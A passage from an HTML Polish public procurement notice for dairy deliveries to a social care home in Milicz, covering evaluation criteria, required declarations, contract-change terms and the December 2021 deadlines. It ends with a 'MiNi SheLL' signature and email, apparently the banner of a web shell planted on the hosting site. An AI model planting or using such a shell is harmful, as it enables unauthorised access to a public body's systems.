znaczeniami oraz w następujący sposób będzie oceniał<br/>spełnienie kryteriów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin jednorazowej dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oferta składana jest na odrębnym formularzu, pod rygorem nieważności w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Wykonawca na podstawie art. 125 ust. 1 ustawy Pzp, dołącza do oferty oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym<br/>w rozdziale VII i VIII SWZ (załącznik nr 3 do SWZ). Oświadczenie to stanowi dowód potwierdzający<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania<br/>ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w niniejszej SWZ.<br/>3. Oświadczenie, o którym mowa w pkt. 2, składane jest pod rygorem nieważności w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.<br/>6. Do oferty wykonawca załącza również:<br/>a) Pełnomocnictwo<br/>b) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (załącznik nr 5 do<br/>SWZ)<br/>c) Zobowiązanie podmiotu trzeciego (załącznik nr 4 do SWZ)<br/>• Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy<br/>potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów<br/>e) Wymagania dotyczące wadium - Zamawiający nie wymaga wniesienia wadium.<br/>f) Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane w toku<br/>postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich<br/>informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje<br/>stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o<br/>zwalczaniu nieuczciwej konkurencji (oświadczenie własne Wykonawcy).<br/>g) Formularz cenowy (załączniki nr 2 do SWZ)<br/>Wymagana forma:<br/>Formularz musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z<br/>formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub<br/>innym dokumencie.<br/>h) Wykaz rozwiązań równoważnych – wykonawca, który powołuje się na rozwiązania równoważne, jest<br/>zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez<br/>zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych z<br/>jego opisem lub normami.<br/>Wymagana forma:<br/>Wszystkie dokumenty przekazuje się w postaci elektronicznej i</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>- oświadczenia wykonawcy (załącznik nr 6 do SWZ), w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył<br/>odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub<br/>wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej;<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo, Oświadczenie wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zobowiązanie podmiotu trzeciego, Zastrzeżenie tajemnicy przedsiębiorstwa,<br/>Formularz cenowy, Wykaz rozwiązań równoważnych.<br/>2. Zamawiający informuje, że ilości towarów określone w Załączniku nr 2 do SWZ<br/>mają charakter szacunkowy i mogą ulec zmianie w zakresie i w okolicznościach wskazanych w<br/>umowie. Wykonawca nie ma prawa do roszczeń odszkodowawczych z tytułu niezrealizowania<br/>całości przedmiotu zamówienia. W ciągu okresu trwania umowy Zamawiający nie jest<br/>zobowiązany do wykorzystania całej szacunkowej ilości artykułów spożywczych przewidzianej w<br/>niniejszym postępowaniu. Z tytułu niewykorzystania całej szacunkowej ilości artykułów<br/>spożywczych Wykonawcy nie przysługuje żądanie zapłaty ani inne odszkodowanie.<br/>3. Miejsce dostawy: Dom Pomocy Społecznej w Miliczu, ul. Kombatantów 1, 56-300 Milicz.<br/>4. Dostawy każdego rodzaju asortymentu odbywać się będą na podstawie zamówień<br/>telefonicznych lub za pomocą poczty elektronicznej.<br/>5. Dostawa przedmiotu zamówienia odbywać się będzie z częstotliwością i w ilościach<br/>wynikających z bieżących potrzeb Zamawiającego, w terminach: nabiał – od poniedziałku do piątku w godz. 5:30 – 6:30.<br/>Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru określają:<br/>a. opis przedmiotu zamówienia – formularz asortymentowo cenowy – stanowiący załącznik nr 2 do SWZ<br/>b. projektowane postanowiena umowy - załącznik nr 8 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie<br/>prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>• Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.• Wszelka korespondencja będzie<br/>prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.• Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący<br/>uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które dostawy<br/>lub usługi wykonają poszczególni wykonawcy.• Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają dostawy lub<br/>usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są<br/>zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które dostawy lub usługi<br/>wykonają poszczególni wykonawcy.• Jeżeli zostanie wybrana oferta wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców, w<br/>której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z zamawiającym oraz do<br/>wystawiania dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta<br/>umowa, nie może być krótszy niż termin realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia<br/>publicznego na warunkach określonych w projektowanych postanowieniach umowy,<br/>stanowiących Załącznik nr 8 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem<br/>zawartym w ofercie. Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę<br/>projektowanych postanowień umowy.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym w projektowanych<br/>postanowieniach umowy, stanowiących Załącznik nr 8 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy<br/>pisemnej.<br/>1. Zmiany niniejszej umowy mogą być dokonywane w granicach określonych w art. 455 ustawy<br/>p.z.p., w formie pisemnej pod rygorem nieważności. Umowa może być także zmieniona w<br/>stosunku do złożonej oferty i na niżej wymienionych warunkach:<br/>1) w stosunku do wartości umowy:<br/>a) w razie zmiany urzędowej stawki podatku VAT – w celu dostosowania do aktualnie<br/>obowiązującej stawki – bez zmiany wartości netto produktów objętych zmianą, jednak nie<br/>wcześniej niż po dacie rozpoczęcia jej obowiązywania. Zmiana umowy w tym zakresie może być<br/>wprowadzona na wniosek Wykonawcy;<br/>b) zamiana ilości poszczególnych pozycji określonych w formularzu asortymentowo - cenowym<br/>stanowiącym załącznik nr 1 do umowy, z zastrzeżeniem, że cena jednostkowa i maksymalna<br/>wartość umowy brutto nie ulegną zmianie,<br/>2) inne:<br/>a) w przypadku zmiany sposobu konfekcjonowania towarów objętych umową, w przypadku<br/>zmiany wielkości opakowania wprowadzonej przez producenta z zachowaniem zasady<br/>proporcjonalności w stosunku do ceny objętej umową, pod warunkiem uzyskania zgody przez<br/>Zamawiającego;<br/>b)w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem<br/>dostawy, możliwość dostarczania odpowiedników towarów objętych umową, o parametrach nie<br/>gorszych niż towary objęte ofertą, przy zachowaniu ceny ofertowej dla danego towaru na<br/>podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania zgody przez<br/>Zamawiającego.<br/>2. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>3. Nie stanowi zmiany umowy w rozumieniu art. 454 ustawy Pzp:<br/>a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana<br/>numeru rachunku bankowego, NIP, REGON);<br/>b) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-22 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/, Składanie ofert odbywa się za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-22 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegać<br/>na potencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 ustawy Pzp. Podmiot<br/>trzeci, na potencjał którego wykonawca powołuje się w celu wykazania spełnienia warunków<br/>udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy<br/>pzp.1) Zamawiający poinformuje wykonawcę, któremu zostanie udzielone zamówienie, o<br/>miejscu i<br/>terminie zawarcia umowy.2) Wykonawca przed zawarciem umowy:- poda wszelkie informacje<br/>niezbędne do wypełnienia treści umowy na wezwanie zamawiającego,Jeżeli zostanie wybrana<br/>oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej<br/>współpracę tych wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do<br/>kontaktów z zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przy<br/>czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji<br/>zamówienia. Niedopełnienie powyższych formalności przez wybranego wykonawcę będzie<br/>potraktowane przez zamawiającego jako niemożność zawarcia umowy w sprawie zamówienia<br/>publicznego z przyczyn leżących po stronie wykonawcy.<br/>Pozostałe zapisy nieujęte w niniejszym ogłoszeniu o zamówieniu zawarte są w Specyfikacji<br/>Warunków Zamówienia,<br/>Specyfikacja Warunków Zamówienia wraz z załącznikami jest integralną częścią niniejszego<br/>ogłoszenia i dostępna jest pod adresem http://bip.milicz-powiat.pl/m,77,zamowieniapubliczne.<br/>html

Creat By MiNi SheLL
Email: jattceo@gmail.com